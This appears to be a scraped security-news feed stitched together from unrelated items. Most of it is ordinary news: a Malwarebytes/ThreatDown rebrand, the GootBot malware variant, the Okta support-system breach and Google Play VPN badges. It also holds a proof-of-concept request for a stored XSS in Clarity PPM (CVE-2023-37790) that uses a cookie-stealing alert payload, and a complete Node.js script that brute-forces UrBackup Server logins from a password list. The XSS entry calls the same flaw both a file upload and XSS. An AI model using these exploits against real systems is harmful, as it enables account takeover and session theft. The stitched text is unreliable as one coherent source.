Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

==================================================================================================================================  
# Title     : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting   attacks.                                                     |  
# Author    : Kaizen                                                                                                       |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)                                           |  
# Vendor    : https://www.broadcom.com/                                                                                             
# Dork      : https://www.broadcom.com/products/software/value-stream-management/clarity                                      |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM

<body onload=alert(document.cookie)>

To Trigger Stored XSS visit user profile picture.

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true

CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

Use after free in WebAudio in Google Chrome prior to 119.0.6045.123 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-5996: Stable Channel Update for Desktop

With the release of ThreatDown, let's take a look at Malwarebytes' 15-year legacy and what's next.

November marks a significant shift in our legacy. After 15 years as Malwarebytes, we are proud to introduce our rebranded identity, ThreatDown powered by Malwarebytes.

Building off Malwarebytes’ initial recognition for removing every trace of viruses that others missed, ThreatDown powered by Malwarebytes combines award-winning technologies that cover all stages of an attack, with managed services for teams with limited resources.

To say it’s been quite a journey to this point would be an understatement. From our beginnings as a remediation consumer tool to becoming a titan in business cyber protection, let’s walk through where we’ve come and where we’re headed.

**Anti-Malware Small Business Edition (2008 – 2012)**

Malwarebytes for Business began its journey in the late 2000s, offering corporate licensing for its consumer anti-malware product. By 2012, our focus intensified as we launched the Anti-Malware Small Business Edition, introducing advanced features to meet the specific demands of businesses.

**Malwarebytes Enterprise Edition (September 2012 – 2016)**

The introduction of Malwarebytes Enterprise Edition (MEE) in late 2012 solidified our position in the enterprise market. Tailored for businesses, governments, and educational institutions, MEE provided comprehensive threat protection and malware remediation. As the demand for our expertise grew, esteemed institutions such as The University of Alabama and NextGen Healthcare became part of our clientele.

**Malwarebytes Endpoint Security (June 2014 – 2016)**

2014 saw the birth of the Anti-Malware Remediation Tool, a streamlined malware solution for businesses. Shortly after, Malwarebytes Endpoint Security was launched, merging multiple essential tools into one comprehensive package.

**Nebula (2017 – 2018)**

Transitioning into cloud security management, 2017 introduced Nebula 1.0, our cloud-based console. This platform brought together our machine learning-backed Malwarebytes Incident Response and Endpoint Protection products.

**OneView (2019)**

2019 heralded the debut of OneView, a multi-tenant console tailored for Managed Service Providers (MSPs). With OneView, MSPs could efficiently manage multiple clients’ security needs from a unified platform.

**Comprehensive Endpoint Detection and Response Offerings (2020 – 2021)**

Throughout 2020 and 2021, we fortified our EDR capabilities, including extensions to support Windows servers. With features such as Flight Recorder Search, Threat Hunting Alerts, and Brute Force Protection, we further strengthened our protective measures against cyber threats.

**Managed Detection and Response (2022)**

Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. Our crowning achievement was the introduction of Malwarebytes Managed Detection and Response (MDR) service, providing 24×7 monitoring and investigations for resource constrained IT teams.

**Securing The Against the Next Generation of Threats (2023 and beyond)**

2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. The introduction of an Application Blocking Module gave administrators even greater control over app installations on devices.

Further, with the release of Malwarebytes Security Advisor, we transformed the Nebula customer experience to enable organizations to visualize and improve their security posture in just a few minutes. We also released Malwarebytes Managed Threat Hunting (MTH), a 24/7 service that proactively identifies and then alerts EDR customers to potential threats before an active attack begins.

**Into The Future With ThreatDown powered by Malwarebytes**

Originating from Malwarebytes’ 15-year legacy in combating daily malware threats, ThreatDown powered by Malwarebytes has evolved in tandem with the ever-changing threat landscape.

ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets. We combine the technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down complexity and take down costs:

*   **ThreatDown Core Bundle**: Basic malware protection and threat surface reduction. A simple yet superior solution integrating award-winning endpoint protection technologies.
*   **ThreatDown Advanced Bundle**: Everything included in core plus Automated Threat Hunting and Ransomware Rollback. Tailored for smaller security teams with limited resources.
*   **ThreatDown Elite Bundle**: Everything in Advanced plus 24/7 expert monitoring and response by Malwarebytes MDR analysts. Purpose-built for organizations with small (to non-existent) security teams that lack the resources to address all security alerts.
*   **ThreatDown Ultimate Bundle**: Everything in Elite plus protection from categories of malicious websites. Perfect for teams looking for a SOC-in-a-box, a one-and-done shortcut to cybersecurity done right.

In short, with ThreatDown, the mission is clear: To take down threats to businesses and reduce attack surfaces immediately, without the need for an IT army or big budgets. Together, we can overpower threats—and empower IT.

Visit www.threatdown.com to learn more.

 ThreatDown powered by Malwarebytes: A 15 Year Journey 

By Deeba Ahmed
GootBot: New Gootloader Variant Evades Detection with Stealthy Lateral Movement.
This is a post from HackRead.com Read the original post: IBM X-Force Discovers Gootloader Malware Variant- GootBot

The original Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.

IBM X-Force has discovered a new variant of the notorious **Gootloader malware**, dubbed GootBot. This malware performs stealthy lateral movement, which complicates the detection or blocking of the campaign within enterprise networks.

According to the **blog post** authored by Golo Mühr and Ole Villadsen, the Gootloader group implements their custom bot in the latter stages of this attack chain to evade detection, using off-the-shelf tools for establishing C2 communication, such as RDP or CobaltStrike.

Gootloader malware was initially used only as an initial access tool and evolved considerably over time to include GootBot, a lightweight obfuscated PS script. It is downloaded after the Gootloader infection and receives commands via C2 through encrypted PowerShell scripts.

For your information, the Gootloader group (aka UNC2565 or Hive0127) first surfaced in 2014 and focused more on SEO poisoning techniques and compromised WordPress websites to distribute the Gootkit-based Gootloader malware. Tanium’s director of endpoint security research, Melissa Bischoping, explained how **SEO poisoning** works. 

One of the hacked websites used in delivered Gootloader malware (Image: Sophos)

“SEO poisoning drives users to malicious payloads by manipulating the search results for key terms. Most security awareness training focuses heavily on phishing and other methods where an attacker sends something to the user. There’s a false sense of security that people place in search result top rankings and an outdated mindset that the lock on the address bar means a site is safe.”

Hackread.com has been following the Gootloader group’s activities since its emergence. The group frequently targets business-related online searchers like queries about legal contracts, creating legit-looking websites, and positioning them on the first page of search results. Once the user visits the page, they entice them into downloading archive files, which appear harmless and relevant to their queries but actually contain Gootloader malware.

In March 2021, Sophos cybersecurity firm **confirmed** that Gootloader has evolved into a sophisticated loader framework from serving as an initial access point, revealing that its delivery method had expanded beyond the Gootkit malware family. As an initial access point, Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.  

GootBot is a novel Gootloader variant. It is a PowerShell payload encapsulating a single C2 server address. Its strings use a replacement key to conduct mild obfuscation. The malware, just like Gootloader, sends a GET request to the C2 server, requesting PowerShell tasks, and gets a string comprising a Base64-encoded payload.

The last 8 digits of the code are the task’s name. It then decodes the payload and injects it into the script block before executing it. The payload runs asynchronously, maintaining a default beaconing interval of 60 seconds. When it receives a C2 task, the next loop iteration starts, and for completed jobs, the results are returned.

GootBot is designed for lateral movement within the network, noted X-Force researchers. Its C2 infrastructure can quickly generate numerous GootBot payloads for distribution, each having a unique C2 address, and can cause multiple infections of the same host. It also runs a reconnaissance script and contains a unique GootBot ID for the host.

This effective malware lets attackers swiftly propagate across the compromised network to deploy additional malicious software. Unlike Gootloader, GootBot spreads through infected domains to reach the domain controller. This indicates a shift in attack tactics from Gootloader operators and enhances the success rate of post-exploitation stages, including Gootloader-based ransomware affiliate activity.

The malware is capable of extracting domain user name, and OS details from the registry key, checks for x86 dir and int ptr size if 64bit architecture is detected, and obtains information about domain controllers from registry and ENV var, SID, local IP address, hostname, and running processes. The data gets formatted with the specified ID.

The emergence of the GootBot variant highlights that attackers are employing sophisticated methods to stay undetected and spread laterally across the network. Lateral-movement scripts are possible through various techniques, such as WinRM, SMB, and WinAPI calls, to spread the payload to other hosts.

Infection diagram

Organizations must implement advanced security mechanisms, including endpoint detection and response (EDR) solutions and regularly updating software to prevent the threat. Bugcrowd cybersecurity firm’s founder and chief strategy officer, **Casey Ellis**, shared the following statement with Hackread.com regarding the current Gootloader campaign.

“This all strikes me as a very organized and thoughtful initial access broker (IAB). Their watering-hole style deployment of malicious SEO isn’t particularly targeted, however, it suits the opportunistic attack model of an IAB quite well. For defenders, it’s important to remember that organized cybercrime is continuing to evolve, stratify, and mature and that the threat actor behaviours now include this type of long, wide game.”

Keeper Security’s CEO and co-founder, **Darren Guccione**, in an exclusive statement shared with Hackread.com, noted that it is hard for innocent users to distinguish between authentic and fabricated search results, which makes SEO poisoning so successful.

“Innocent people who are not trained on SEO (Search Engine Optimization) and SEO-related attack vectors, including SEO poisoning, generally focus on the aesthetics of the search results page they are familiar with such as the domain name and the logos displayed. Often, threat actors will use language like “Official Website” to lure people into clicking a dangerous link or visiting a spoofed site that can download Gootloader or other malware onto their device.”

However, some scrutiny can prove beneficial in detecting malicious websites, said Guccione. “Phony or spoofed websites will usually have a different website address than the official company name and can also use different domain extensions than the one for the legitimate website. The majority of popular websites use the domain extension .com,” explained Guccione. 

“If you visit a site, pay special attention to the domain itself and if it appears to be abnormally long or unrecognizable based on your normal search activity, it’s best to ignore it – and not click on any link. Online tools such as a Google Transparency Report can also be used to determine whether a site is safe.”

1.  Google Algorithm Updates vs SEO Strategies
2.  How Can SEO Help Increase Website Security?
3.  Google Indexed Trove of Bard AI User Chats in Search Results
4.  Ad-blocker Chrome extension AllBlock injected ads in Google searches
5.  Malicious Chrome, Edge extensions manipulating Google search results

IBM X-Force Discovers Gootloader Malware Variant- GootBot

Okta has concluded that the root cause of its breach was an employee storing company credentials in a private Google account.

Okta has revealed details about a recent breach which exposed files belonging to customers.

As we explained in our article about 1Password being a victim of this breach, it’s normal for Okta support to ask customers to upload a file known as an HTTP Archive (HAR) file. Having this file allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

After 1Password, BeyondTrust, and Cloudflare detected unauthorized log-in attempts to their in-house Okta administrator accounts, they reported the incidents to Okta who started an investigation.

Okta says it found that from September 28 to October 17, 2023 an attacker had unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers.

The attacker gained access using stolen credentials of a service account stored in the system itself, which had permissions to view and update customer support cases.

To gain access to that service account, the attacker compromised an Okta employee. The employee logged into the service account while they were signed in to their personal Google profile in Chrome on their Okta-managed laptop. That meant that the credentials of the service account were stored in the employee’s personal Google account.

How they got from that account into the attacker’s hands is unknown, but likely the attacker compromised that personal account or one of the employee’s devices fell into the attacker’s hands, from where they could accessed the Google account and harvested the credentials.

Once in, the attacker was able to use session tokens in the HAR files to impersonate staff and hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare.

Okta says it has now locked down personal Google access on company-managed computers:

> “Okta has implemented a specific configuration option within Chrome Enterprise that prevents sign-in to Chrome on their Okta-managed laptop using a personal Google profile.”

In general, it’s hard to strictly separate the use of devices for work purposes— in a 2020 survey by Malwarebytes, we found that the majority of people do use work devices for personal use. When a device gets assigned to an employee, they consider it more or less as “theirs” and there’s a tendency to start using it for personal matters. Okta could have anticipated this behavior and added additional security measures for such an important account.

A remediation task that is important to note for Okta customers is:

> “Okta has released session token binding based on network location as a product enhancement to combat the threat of session token theft against Okta administrators. Okta administrators are now forced to re-authenticate if we detect a network change. **This feature can be enabled by customers in the early access section of the Okta admin portal.**”

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

 Okta breach happened after employee logged into personal Google account 

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

CVE-2023-47102: Quantiano

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

CVE-2023-36409

By Waqas
Some of the most prominent victims of the data breach include Cloudflare, 1Password, and BeyondTrust.
This is a post from HackRead.com Read the original post: Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

Okta’s investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

In a recent update following the initial data breach announcement made in October 2023, Okta, a prominent identity and access management (IAM) provider, disclosed that the number of affected customers has now reached 134. This breach enabled threat actors to gain unauthorized access to files.

“Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” David Bradbury, Okta’s chief security officer explained in Friday’s November 4th update.

Between September 28 and October 17, 2023, Okta encountered a sophisticated attack, wherein a threat actor accessed Okta’s support case management system by compromising a stolen account. Afterwards, the threat actor gained the ability to view, update support cases, and extract sensitive data, which included session tokens.

On October 19, Okta became aware of the breach following a notification from one of its customers, BeyondTrust, regarding suspicious activities. Among the prominent customers affected by the breach are Cloudflare and 1Password. Pedro Canahuati, the CTO of 1Password, disclosed the incident, confirming that threat actors were unable to access or extract user data during the attack.

****Google Account Connection****

Originally, the incident was thought to occur as a threat actor accessed an IT employee’s Okta session token by leveraging a stolen credential, thus gaining entry into 1Password’s Okta administrative portal. However, Bradbury later revealed that the investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

“Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop,” Bradbury said. “The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.”

As to why it took two weeks for Okta to address the issue, Bradbury further explained that “Okta didn’t find any suspicious downloads in their system logs.” They noted that when someone looks at files attached to a support case, there’s a special record in their logs. But if a person goes directly to the Files section in the customer support system, it creates a different record. The attackers used this method in their attack.

“Okta first looked into access to support cases and then checked the logs related to those cases. On October 13, 2023, BeyondTrust gave Okta Security an IP address linked to the attackers. With this information, Okta found more file access events tied to the compromised account,” said Bradbury.

In a comment to Hackread.com, Tal Skverer, Research Team Lead at Astrix Security, discussed the use of personal accounts on devices issued by the company stating that “Service accounts skip security measures that normal accounts are subject to, such as MFA, therefore; their credentials are extremely vulnerable.”

“It is with utmost importance that service accounts follow the least privilege principle. Skverer emphasised. “To limit their permissions, their usage should be limited to very unique functionalities.”

The Okta breach is a major concern for the cybersecurity community, as Okta is a trusted IAM provider for many organizations, including Fortune 500 companies and government agencies. The breach also highlights the growing sophistication of threat actors and the need for organizations to take steps to protect their data from increasingly targeted attacks.

Nevertheless, the latest security breach at Okta serves as the second cyberattack on the company. In March 2022, LAPSUS$ hackers claimed to have breached Okta and Microsoft after leaking a trove of their data on Telegram.

****What Organizations Can Do to Protect Themselves****

Organizations can take a number of steps to protect themselves, including:

*   **Implement strong password policies and require users to use multi-factor authentication (MFA).** MFA adds an extra layer of security to user accounts by requiring users to provide a second form of authentication, such as a code from their phone, in addition to their password.
*   **Regularly update security software and patches.** Software developers release security updates to patch known vulnerabilities. By regularly updating their software and patches, organizations can help to reduce the risk of being exploited by attackers.
*   **Educate employees about cybersecurity best practices.** Employees should be trained on how to identify and avoid phishing attacks, and how to protect their devices and data.
*   **Monitor their systems for suspicious activity.** Organizations should have systems in place to monitor their systems for suspicious activity, such as unusual login attempts or data exfiltration.

1.  IBM Notifies Janssen CarePath Customers of Data Breach
2.  Human Error: Casio ClassPad Data Breach Impacting 148 Countries
3.  Sony Data Breach via MOVEit Vulnerability Affects Thousands in US
4.  Fake Bitwarden Password Manager Website Drops Windows ZenRAT
5.  Kroll SIM-Swapping Attack Causes Data Breach at 3 Top Crypto Firms
6.  Passwords by Kaspersky Password Manager exposed to brute-force attack

Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

By Deeba Ahmed
The new feature will add an Independent Security Review badge at the top of the Google Play search results page when users search for VPN apps. 
This is a post from HackRead.com Read the original post: Google Launches Verification Badges for Security Tested VPN Apps

The new feature is the latest in line with increasing security and precautionary measures by Google to keep malicious Android apps away from its Play Store.

Google Play has introduced a new feature to inform users looking for reliable VPN (virtual private network) apps if the apps have undergone an independent security review. The new feature will add an Independent Security Review badge at the top of the Google Play search results page when users search for VPN apps. 

This badge will ensure the app has been scanned through an independent security review. That’s not all! The banner will provide additional information under the Learn More option, which will redirect them to the App Validation Directory, providing technical assessment details so that users can make informed decisions when downloading VPNs.

Screenshot: Google

The certification can be checked in the app’s Data Safety section on Google Play Store. Its presence means the application has been tested against pre-determined security criteria, which Google has developed with several cybersecurity partners.

The badge will inform users that the app has been verified and validated by an independent third party and meets the minimum best practices standards of the industry’s mobile security and privacy guidelines. It will also indicate that the app’s developers will identify/mitigate vulnerabilities promptly.

For your information, in 2022, the App Defense Alliance (ADA) launched the Mobile App Security Assessment (MASA) to let developers evaluate their apps independently against a strict global security standard.

This serves as an assurance for users that app developers are following best practices for privacy and security. Successful validation will allow the developers to display the badge in their app’s Data Safety section. This addition will make it more challenging for cybercriminals to access users’ devices through compromised apps and improve the app’s quality.

Although adhering to “baseline security standards” won’t guarantee that the app will be vulnerability-free, the badge will serve as a “visual cue” for users that it has been scanned and validated.

The new feature has been rolled out for VPN apps and selected app categories as the company wants to secure sensitive apps initially. VPNs hold a substantial volume of data as they are primarily used for searching and accessing websites. In a blog post, Nataliya Stanetsky, Android Security and Privacy Team wrote that:

> _“VPN providers such as NordVPN, Google One, ExpressVPN, and others have already undergone independent security testing and publicly declared the badge showing their good standing with the MASA program. We encourage and anticipate additional VPN app developers to undergo independent security testing, bringing even more transparency to users.”_
> 
> Google

This is a proactive move to enhance app security and protect user data, underscoring the company’s commitment to improving cybersecurity in the digital space. Users are generally unaware of the risks associated with VPN apps. Many of these apps can be designed to collect sensitive device or user data and may even inject malware onto their devices. 

1.  Google Makes Passkeys Default for All Users
2.  Google offers Dark Web monitoring for US Gmail users
3.  Google Buys Cyber Security Firm Mandiant for $5.4 Billion
4.  Google Chrome to Mask User IP Addresses to Protect Privacy
5.  Google Introduces Bug Bounty Program for Open-Source Software
6.  Google Removes Swing VPN Android App Exposed as DDoS Botnet
7.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID
